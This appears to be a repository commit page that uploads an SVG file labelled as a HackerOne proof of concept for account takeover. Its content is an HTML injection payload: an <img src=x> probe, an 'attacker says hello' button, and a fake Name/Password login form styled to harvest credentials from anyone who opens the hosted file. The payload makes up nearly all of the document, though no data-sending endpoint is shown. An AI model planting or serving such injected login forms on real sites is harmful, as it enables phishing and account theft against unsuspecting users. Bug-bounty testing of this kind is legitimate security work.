attacker-exploiting-everyone commited on
Commit
783a013
1 Parent(s): c0a9202

Upload SVG WEBPAGE ATO.svg

Browse files

<button style="color:red;border-radius:3px;padding:10px;">ATTACKER SAYS HELLO THOUGH</button>

<img src=x> IMAGE IS TO BE HERE BUT WE USE NULL :X

<h1>HACKERONE POC FOR THEE ECLIPSE</h1>

<p style="color:blue;">

<body style="background-color: #f0f0f0; text-align: center; padding-top: 50px;">

<form style="display: inline-block; padding: 20px; border: 2px solid red; border-radius: 5px; background-color: white;">
<div style="margin-bottom: 15px;">
<label for="name" style="display: block; margin-bottom: 5px;">Name:</label>
<input type="text" id="name" name="name" style="padding: 10px; border: 2px solid red; border-radius: 5px; width: 100%; box-sizing: border-box;">
</div>
<div style="margin-bottom: 15px;">
<label for="password" style="display: block; margin-bottom: 5px;">Password:</label>
<input type="password" id="password" name="password" style="padding: 10px; border: 2px solid red; border-radius: 5px; width: 100%; box-sizing: border-box;">
</div>
<button type="submit" style="padding: 10px 20px; border: 2px solid red; border-radius: 5px; background-color: red; color: white; cursor: pointer;">Submit</button>
</form>

</body>

Files changed (1) hide show
  1. SVG WEBPAGE ATO.svg +10 -0
SVG WEBPAGE ATO.svg ADDED